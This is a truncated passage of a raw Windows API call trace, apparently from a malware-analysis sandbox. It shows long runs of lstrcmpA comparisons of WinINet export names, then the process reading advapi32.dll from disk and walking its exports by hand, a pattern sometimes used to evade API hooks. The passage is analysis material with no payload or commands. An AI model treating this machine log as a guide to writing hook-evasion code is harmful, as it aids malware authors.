returned 1 [0081.505] lstrcmpA (lpString1="AppCacheCloseHandle", lpString2="AppCacheCloseHandle") returned 0 [0081.505] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCheckManifest") returned 1 [0081.505] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCloseHandle") returned 1 [0081.505] lstrcmpA (lpString1="AppCacheCreateAndCommitFile", lpString2="AppCacheCreateAndCommitFile") returned 0 [0081.505] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCheckManifest") returned 1 [0081.505] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCloseHandle") returned 1 [0081.505] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.505] lstrcmpA (lpString1="AppCacheDeleteGroup", lpString2="AppCacheDeleteGroup") returned 0 [0081.505] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCheckManifest") returned 1 [0081.506] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCloseHandle") returned 1 [0081.506] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.506] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteGroup") returned 1 [0081.588] lstrcmpA (lpString1="AppCacheDeleteIEGroup", lpString2="AppCacheDeleteIEGroup") returned 0 [0081.588] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCheckManifest") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCloseHandle") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteGroup") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheDuplicateHandle", lpString2="AppCacheDuplicateHandle") returned 0 [0081.589] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCheckManifest") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCloseHandle") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteGroup") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheDuplicateHandle") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFinalize", lpString2="AppCacheFinalize") returned 0 [0081.589] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFinalize") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFreeDownloadList", lpString2="AppCacheFreeDownloadList") returned 0 [0081.589] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCheckManifest") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCloseHandle") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFinalize") returned 1 [0081.589] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeGroupList", lpString2="AppCacheFreeGroupList") returned 0 [0081.590] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCheckManifest") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCloseHandle") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteGroup") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheDuplicateHandle") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFinalize") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeDownloadList") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeGroupList") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeIESpace", lpString2="AppCacheFreeIESpace") returned 0 [0081.590] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCheckManifest") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCloseHandle") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteGroup") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheDuplicateHandle") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFinalize") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeDownloadList") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeGroupList") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeIESpace") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheFreeSpace", lpString2="AppCacheFreeSpace") returned 0 [0081.590] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCheckManifest") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCloseHandle") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteGroup") returned 1 [0081.590] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheDuplicateHandle") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFinalize") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeDownloadList") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeGroupList") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeIESpace") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheFreeSpace") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetDownloadList", lpString2="AppCacheGetDownloadList") returned 0 [0081.591] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCheckManifest") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCloseHandle") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteGroup") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFinalize") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeGroupList") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeIESpace") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheFreeSpace") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetDownloadList") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetFallbackUrl", lpString2="AppCacheGetFallbackUrl") returned 0 [0081.591] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCheckManifest") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCloseHandle") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFinalize") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0081.591] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheFreeSpace") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetGroupList", lpString2="AppCacheGetGroupList") returned 0 [0081.592] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCheckManifest") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCloseHandle") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteGroup") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheDuplicateHandle") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFinalize") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeDownloadList") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeGroupList") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeIESpace") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheFreeSpace") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetDownloadList") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetFallbackUrl") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetGroupList") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetIEGroupList", lpString2="AppCacheGetIEGroupList") returned 0 [0081.592] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCheckManifest") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCloseHandle") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.592] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteGroup") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheDuplicateHandle") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFinalize") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeDownloadList") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeGroupList") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeIESpace") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheFreeSpace") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetDownloadList") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetFallbackUrl") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetGroupList") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetIEGroupList") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetInfo", lpString2="AppCacheGetInfo") returned 0 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCheckManifest") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCloseHandle") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteGroup") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheDuplicateHandle") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFinalize") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeDownloadList") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeGroupList") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeIESpace") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheFreeSpace") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetDownloadList") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetFallbackUrl") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetGroupList") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetIEGroupList") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetInfo") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheGetManifestUrl", lpString2="AppCacheGetManifestUrl") returned 0 [0081.593] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCheckManifest") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCloseHandle") returned 1 [0081.593] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.594] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteGroup") returned 1 [0081.594] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.594] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheDuplicateHandle") returned 1 [0081.594] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFinalize") returned 1 [0081.594] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeDownloadList") returned 1 [0081.594] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeGroupList") returned 1 [0081.594] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeIESpace") returned 1 [0081.594] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheFreeSpace") returned 1 [0081.594] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetDownloadList") returned 1 [0081.594] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetFallbackUrl") returned 1 [0081.594] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetGroupList") returned 1 [0081.594] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetIEGroupList") returned 1 [0081.594] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetInfo") returned 1 [0081.594] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheGetManifestUrl") returned 1 [0081.594] lstrcmpA (lpString1="AppCacheLookup", lpString2="AppCacheLookup") returned 0 [0081.594] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCheckManifest") returned 1 [0081.594] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCloseHandle") returned 1 [0081.594] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.594] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteGroup") returned 1 [0081.594] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.594] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheDuplicateHandle") returned 1 [0081.594] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFinalize") returned 1 [0081.594] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeDownloadList") returned 1 [0081.594] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeGroupList") returned 1 [0081.594] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeIESpace") returned 1 [0081.594] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheFreeSpace") returned 1 [0081.594] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetDownloadList") returned 1 [0081.594] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetFallbackUrl") returned 1 [0081.594] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetGroupList") returned 1 [0081.594] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetIEGroupList") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetInfo") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheGetManifestUrl") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="AppCacheLookup") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryA", lpString2="CommitUrlCacheEntryA") returned 0 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCheckManifest") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCloseHandle") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteGroup") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheDuplicateHandle") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFinalize") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeDownloadList") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeGroupList") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeIESpace") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheFreeSpace") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetDownloadList") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetFallbackUrl") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetGroupList") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetIEGroupList") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetInfo") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheGetManifestUrl") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="AppCacheLookup") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryA") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryBinaryBlob", lpString2="CommitUrlCacheEntryBinaryBlob") returned 0 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCheckManifest") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCloseHandle") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteGroup") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheDuplicateHandle") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFinalize") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeDownloadList") returned 1 [0081.595] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeGroupList") returned 1 [0081.596] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeIESpace") returned 1 [0081.596] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheFreeSpace") returned 1 [0081.596] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetDownloadList") returned 1 [0081.596] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetFallbackUrl") returned 1 [0081.596] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetGroupList") returned 1 [0081.596] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetIEGroupList") returned 1 [0081.596] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetInfo") returned 1 [0081.596] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheGetManifestUrl") returned 1 [0081.596] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="AppCacheLookup") returned 1 [0081.596] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryA") returned 1 [0081.596] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryBinaryBlob") returned 1 [0081.596] lstrcmpA (lpString1="CommitUrlCacheEntryW", lpString2="CommitUrlCacheEntryW") returned 0 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCheckManifest") returned 1 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCloseHandle") returned 1 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheCreateAndCommitFile") returned 1 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteGroup") returned 1 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDeleteIEGroup") returned 1 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheDuplicateHandle") returned 1 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFinalize") returned 1 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeDownloadList") returned 1 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeGroupList") returned 1 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeIESpace") returned 1 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheFreeSpace") returned 1 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetDownloadList") returned 1 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetFallbackUrl") returned 1 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetGroupList") returned 1 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetIEGroupList") returned 1 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetInfo") returned 1 [0081.596] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheGetManifestUrl") returned 1 [0081.597] lstrcmpA (lpString1="CreateMD5SSOHash", lpString2="AppCacheLookup") returned 1 [0081.609] GetProcessHeap () returned 0x440000 [0081.609] HeapFree (in: hHeap=0x440000, dwFlags=0x0, lpMem=0x4030040 | out: hHeap=0x440000) returned 1 [0081.620] GetProcessHeap () returned 0x440000 [0081.620] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x10) returned 0x459160 [0081.622] LoadLibraryA (lpLibFileName="Advapi32.dll") returned 0x7ffc5ec20000 [0081.622] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0081.622] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0081.622] GetModuleFileNameA (in: hModule=0x7ffc5ec20000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")) returned 0x20 [0081.623] CreateFileA (lpFileName="C:\\Windows\\system32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0081.623] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0081.623] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0081.623] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=671472) returned 1 [0081.623] GetProcessHeap () returned 0x440000 [0081.623] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0xa3ef0) returned 0x2c72010 [0081.811] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0081.811] ReadFile (in: hFile=0x140, lpBuffer=0x2c72010, nNumberOfBytesToRead=0xa3ef0, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2c72010*, lpNumberOfBytesRead=0x14f5a4*=0xa3ef0, lpOverlapped=0x0) returned 1 [0081.823] CloseHandle (hObject=0x140) returned 1 [0081.824] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAFinal") returned 1 [0081.824] lstrcmpA (lpString1="AbortSystemShutdownA", lpString2="A_SHAInit") returned 1 [0081.824] lstrcmpA (lpString1="AbortSystemShutdownA", 